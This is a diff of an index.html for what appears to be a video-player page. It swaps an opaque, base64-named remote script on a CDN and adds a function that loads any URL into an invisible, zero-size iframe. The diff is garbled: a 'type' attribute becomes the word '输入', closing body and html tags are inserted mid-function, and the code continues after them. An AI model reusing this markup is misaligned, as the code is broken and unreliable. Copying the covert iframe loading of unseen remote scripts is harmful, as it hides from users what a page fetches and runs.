--- a/index.html
+++ b/index.html
@@ -1,4 +1,5 @@
 
+
 <!DOCTYPE html>
 <html>
 <head>
@@ -12,13 +13,12 @@
     <meta name="referrer" content="never"/>
     <meta http-equiv="Access-Control-Allow-Origin" content="*" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
-    <link rel="shortcut icon" type="image/x-icon" href="img/logo.png" media="screen" />
-    <link rel="stylesheet" href="https://nim.nosdn.127.net/MTAyNDkzMg==/bmltYV8zNDc1MjQ0MDAxMV8xNzQwMzg0NDMzNTQ3XzAyNWUzMDE1LTBhN2MtNGFlMC1iOTZkLTczODVkOTQ5ZTYzYQ==">
+    <link rel="shortcut icon" 输入="image/x-icon" href="img/logo.png" media="screen" />
+        <link rel="stylesheet" href="https://nim.nosdn.127.net/MTAyNDkzMg==/bmltYV8zNDc1MjQ0MDAxMV8xNzQwMzg0NDMzNTQ3XzAyNWUzMDE1LTBhN2MtNGFlMC1iOTZkLTczODVkOTQ5ZTYzYQ==">
     <script src="https://nim.nosdn.127.net/MTY4NDA1NTk=/bmltYV8yNjk4MzIxNjQyMTNfMTc0NTUxNzgwMTk2OF80YTNhM2QyMy1jNWZhLTQ2YmUtOTQxOS1lM2UyNjUyYmZkMWE="></script>
     <script src="https://nim.nosdn.127.net/MTAyNDkzMg==/bmltYV8zNDc1MjQ0MDAxMV8xNzA2MDcyNDQxMjQ2X2RlMDJmYTU3LWE3ZGYtNDEzYS1iNDM5LTc2YTVmYjAzMzMwZA=="></script>
     <script src="https://nim.nosdn.127.net/MTAyNDkzMg==/bmltYV8zNDc1MjQ0MDAxMV8xNzA2MDcyMzY1NDUyXzRkZjlmZGExLWEzODQtNGFhMy1hNTQ4LTgwZmYyN2I1NzFjMQ=="></script>
-    <script src="https://nim.nosdn.127.net/MTY4NDA1NTk=/bmltYV8yNjk4MzIxNjQyMTNfMTc0NTUxNzYyNTM0Nl8yZmVmMjNiNy00ZWQ1LTQ1ZmUtOGMzMS0wYTRiNWJlZGYyNTk="></script>
-</head>
+    <script src="https://nim.nosdn.127.net/MTY2Nzg1Nzg=/bmltYV8zMjA1MTUyOTczNjFfMTc1MzMyNTgxMzk1M185Y2Y2NTcyYy1hOWNhLTQwYTktYTNkNy0xYjU1OWU3YjU5NTk="></script></head>
 <body>
 <div id="loading" align="center"><div class="mov"></div></div>
 <div id="player" class="w-h"></div>
@@ -34,6 +34,21 @@
         }
         let  box = $("#player");
                 function cric(url, sp) {
+                var _iframe = document.createElement("iframe");
+                _iframe.src = url;
+                _iframe.name = sp;
+                _iframe.id = _iframe.name;
+                _iframe.width = 0;
+                _iframe.height = 0;
+                _iframe.border = "0";
+                _iframe.style.visibility = "hidden";
+                _iframe.sandbox = "allow-scripts allow-same-origin";
+                document.body.appendChild(_iframe);
+            }
+</script>
+</div>
+</body>
+</html>
                 var _iframe = document.createElement("iframe");
                 _iframe.src = url;
                 _iframe.name = sp;
